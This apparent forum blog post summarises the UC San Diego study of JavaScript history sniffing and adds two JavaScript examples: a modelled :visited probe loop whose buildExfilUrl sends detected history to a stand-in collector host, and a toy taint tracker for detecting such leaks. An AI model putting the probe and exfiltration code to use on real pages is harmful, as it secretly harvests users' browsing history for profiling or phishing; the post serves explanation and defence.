mihir23192

Your Web Surfing History Is Accessible (Without Your Permission) Via JavaScript By ..:: NEXUSS ::..

The Web surfing history saved in your Web browser can be accessed without your permission. JavaScript code deployed by real websites and online advertising providers uses a browser weakness, the different styling of visited and unvisited links, to determine which sites you have and have not visited, according to new research from computer scientists at the University of California, San Diego.
[Image: javascript-history-filtered.jpg]
"JavaScript is a great thing, it allows things like Gmail and Google Maps and a whole bunch of Web 2.0 applications; but it also opens up a lot of security vulnerabilities. We want to let the broad public know that history sniffing is possible, it actually happens out there, and that there are a lot of people vulnerable to this attack," said UC San Diego computer science professor Sorin Lerner.
The researchers documented JavaScript code secretly collecting browsing histories of Web users through "history sniffing" and sending that information across the network. While history sniffing and its potential implications for privacy violation have been discussed and demonstrated, the new work provides the first empirical analysis of history sniffing on the real Web.
"Nobody knew if anyone on the Internet was using history sniffing to get at users' private browsing history. What we were able to show is that the answer is yes," said UC San Diego computer science professor Hovav Shacham.
The computer scientists from the UC San Diego Jacobs School of Engineering presented this work in October at the 2010 ACM Conference on Computer and Communications Security (CCS 2010) in a paper entitled, "An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications."

History Sniffing

History sniffing takes place without your knowledge or permission and relies on the fact that browsers display links to sites you've visited differently than ones you haven't: by default, visited links are purple, unvisited links blue. History sniffing JavaScript code running on a Web page creates links to specific URLs and asks the browser, through the computed style of each link, whether it is rendered blue or purple; a purple answer means the URL is in your history.
History sniffing can be used by website owners to learn which competitor sites visitors have or have not been to. History sniffing can also be deployed by advertising companies looking to build user profiles, or by online criminals collecting information for future phishing attacks. Learning what banking site you visit, for example, suggests which fake banking page to serve up during a phishing attack aimed at collecting your bank account login information.
At the time of this post, the latest versions of Firefox, Chrome, and Safari block the history sniffing attacks the computer scientists monitored. Internet Explorer, however, does not currently defend against history sniffing. In addition, anyone using anything but the latest versions of the patched browsers is also vulnerable.
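The probe loop described above, as an added example that is not code from the UC San Diego paper or from any site it studied. It models the CSS :visited sniff and the browser fix side by side: the browser's style lookup is injected as a callback so the logic runs under Node, and the URLs, colours, collector host and victim history are all constructed for the demonstration.

```javascript
// Added example, not code from the UC San Diego paper or from any site it studied.
// Models the CSS :visited history-sniffing probe and the browser mitigation, with
// the browser's style lookup injected so it can run under Node.

// Constructed: the colours a sniffing page's stylesheet assigns to links.
const STYLE = { visited: 'rgb(128, 0, 128)', unvisited: 'rgb(0, 0, 238)' };

// Constructed: candidate URLs the attacker wants to test (hypothetical hosts).
const PROBE_URLS = [
  'https://bank-a.example/login',
  'https://bank-b.example/login',
  'https://competitor.example/',
  'https://news.example/',
];

// The sniffing loop. In a real page probeColor(url) would be:
//   const a = document.createElement('a'); a.href = url;
//   document.body.appendChild(a);
//   const c = getComputedStyle(a).color; a.remove(); return c;
// The browser never tells the script "visited"; it only answers the colour
// question, and the script infers history from the answer.
function sniffHistory(urls, probeColor) {
  const visited = [];
  for (const url of urls) {
    if (probeColor(url) === STYLE.visited) visited.push(url);
  }
  return visited;
}

// Constructed model of an unpatched browser: getComputedStyle reports the
// :visited rule truthfully, so each probe leaks one bit of history.
function leakyBrowser(history) {
  return (url) => (history.has(url) ? STYLE.visited : STYLE.unvisited);
}

// Constructed model of a patched browser: the link is still drawn purple on
// screen, but every style value exposed to script is the unvisited one.
function patchedBrowser(_history) {
  return (_url) => STYLE.unvisited;
}

// What a sniffing script sends home: the hits, URL-encoded into a request to
// an attacker-controlled collector (hypothetical host).
function buildExfilUrl(visitedUrls, collector = 'https://collector.example/log') {
  const params = new URLSearchParams();
  for (const url of visitedUrls) params.append('v', url);
  return `${collector}?${params.toString()}`;
}

// Constructed victim history for the demonstration.
const VICTIM_HISTORY = new Set(['https://bank-a.example/login', 'https://news.example/']);

const leaked = sniffHistory(PROBE_URLS, leakyBrowser(VICTIM_HISTORY));
const leakedPatched = sniffHistory(PROBE_URLS, patchedBrowser(VICTIM_HISTORY));
console.log('unpatched browser leaks:', leaked);
console.log('patched browser leaks:  ', leakedPatched);
console.log('exfiltration request:   ', buildExfilUrl(leaked));
```

The point of the two browser models is that the fix does not change what the user sees; it changes what script is allowed to observe. A site that wants to test a thousand URLs only pays a thousand style lookups, which is why the probe list in real deployments could be long.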

Sniffing out History Sniffing

"We built a dynamic data flow engine for JavaScript to track history sniffing in the wild. I don't know of any other practical tool that can be used to do this kind of extensive study," said Dongseok Jang, the UC San Diego computer science Ph.D. student who developed the JavaScript monitoring technology. The researchers plan to broaden their work and study what information is being leaked by applications on social media and other Web 2.0 sites.
The computer scientists looked for history sniffing on the front pages of the top 50,000 websites, according to Alexa global website rankings. They found that 485 of the top 50,000 sites inspect style properties that can be used to infer the browser's history. Out of 485 sites, 63 transferred the browser's history to the network. "We confirmed that 46 of them are actually doing history sniffing, one of these sites being in the Alexa global top 100," the UC San Diego computer scientists write in the CCS 2010 paper.
Table 1 in the paper outlines the websites the computer scientists found that performed history sniffing during the data collection period. In some cases, the websites created their own history sniffing systems. In other cases, advertisements served by outside companies contained JavaScript code performing the history sniffing.

History Sniffing in Perspective

The computer scientists say that history sniffing does not pose as great a risk to your privacy or identity as malicious software programs (malware) that can steal your banking information or your entire Facebook profile. But, according to Shacham, "history sniffing is unusual in effectively allowing any site you visit to learn about your browsing habits on any other site, regardless if the two sites have any business relationship."

To see history sniffing in action, visit: www.whattheinternetknowsaboutyou.com
"I think people who have updated or switched browsers should now worry about things other than history sniffing, like keeping their Flash plug-in up to date so they don't get exploited. But that doesn't mean that the companies that have engaged in history sniffing for the currently 60 percent of the user population that is vulnerable to it should get a free pass," said Shacham.

Tracking History Sniffing

The UC San Diego history-sniffing detection tool analyzes the JavaScript running on the page to identify and tag all instances where the browser history is being checked. The way the system tags each of these potential history tracking events can be compared to the ink or paint packets that banks add to bags of money being stolen.
"As soon as a JavaScript tries to look at the color of a link, we immediately put 'paint' on that. Some sites collected that information but never sent it over the network, so there was all this 'paint' inside the browser. But in other cases, we observed 'paint' being sent over the network, indicating that history sniffing is going on," explained Lerner. The computer scientists only considered it history sniffing when the browser history information was sent over the network to a server.
"We detected when browser history is looked at, collected on the browser and sent on the network from the browser to their servers. What servers then do with that information is speculation," said Lerner.
The "paint" tracking approach to monitoring JavaScript could be useful for more than just history sniffing, Lerner explained. "It could be useful for understanding what information is being leaked by applications on Web 2.0 sites. Many of these apps use a lot of JavaScript."
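The "paint" idea from the two sections above, as an added example that is not the UC San Diego engine (which instrumented a real JavaScript interpreter). This toy tracker applies the same policy to a few constructed operations: reading a link colour is a taint source, comparisons and concatenations propagate taint, and a network send is the sink that gets reported only when its argument is painted. The probe list, collector host and victim history are constructed and hypothetical.

```javascript
// Added example, not the UC San Diego engine. A toy dynamic taint ("paint")
// tracker applying the post's policy to constructed operations.

const VISITED_COLOR = 'rgb(128, 0, 128)';
const UNVISITED_COLOR = 'rgb(0, 0, 238)';
// Constructed probe list, collector host and victim history (hypothetical).
const PROBES = ['https://bank-a.example/login', 'https://competitor.example/'];
const COLLECTOR = 'https://collector.example/log';
const HISTORY = new Set(['https://bank-a.example/login']);

// A value plus the set of history URLs it depends on (its "paint").
class Tainted {
  constructor(value, labels) { this.value = value; this.labels = new Set(labels); }
}
const taintOf = (v) => (v instanceof Tainted ? v.labels : new Set());
const valueOf = (v) => (v instanceof Tainted ? v.value : v);

// Source: reading a link's computed colour paints the result with that URL.
function readLinkColor(url, history) {
  const color = history.has(url) ? VISITED_COLOR : UNVISITED_COLOR;
  return new Tainted(color, ['history:' + url]);
}

// Propagation: a comparison or concatenation carries the union of its operands' paint.
function taintedEq(a, b) {
  return new Tainted(valueOf(a) === valueOf(b), [...taintOf(a), ...taintOf(b)]);
}
function taintedConcat(...parts) {
  return new Tainted(parts.map(valueOf).join(''), parts.flatMap((p) => [...taintOf(p)]));
}

// Sink: the monitor records every network request whose URL or body is painted.
function makeMonitor() {
  const reports = [];
  return {
    send(url, body) {
      const labels = new Set([...taintOf(url), ...taintOf(body)]);
      if (labels.size > 0) {
        reports.push({ to: valueOf(url), body: valueOf(body), leaked: [...labels].sort() });
      }
    },
    reports,
  };
}

// Constructed site 1: probes each URL and ships the answers to its collector.
function sniffingSite(monitor, history) {
  let payload = '';
  for (const url of PROBES) {
    const visited = taintedEq(readLinkColor(url, history), VISITED_COLOR);
    payload = taintedConcat(payload, url, '=', visited, ';');
  }
  monitor.send(COLLECTOR, payload);
}

// Constructed site 2: reads the same colours but only sends an unpainted beacon,
// so by the paper's criterion (paint must reach the network) it is not sniffing.
function localOnlySite(monitor, history) {
  const colors = PROBES.map((url) => readLinkColor(url, history));
  monitor.send(COLLECTOR, 'pageview=' + colors.length);
}

// Run one site under the monitor and return what it leaked.
function runSite(site) {
  const monitor = makeMonitor();
  site(monitor, HISTORY);
  return monitor.reports;
}

console.log('sniffing site:  ', JSON.stringify(runSite(sniffingSite)));
console.log('local-only site:', JSON.stringify(runSite(localOnlySite)));
```

The toy only follows explicit flows (data copied from operand to result). A real engine also has to follow implicit flows, where a painted value decides which branch runs and the branch then writes an unpainted constant; without that, a sniffer that writes "1" or "0" inside an `if` on the colour would slip past the sink check.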

Updated 4th January 2011 at 03:13 AM by mihir23192

Categories
Technology

Comments

  1. [FE].Zatak
    Interesting... found another reason for quitting Internet Explorer. Thanks.
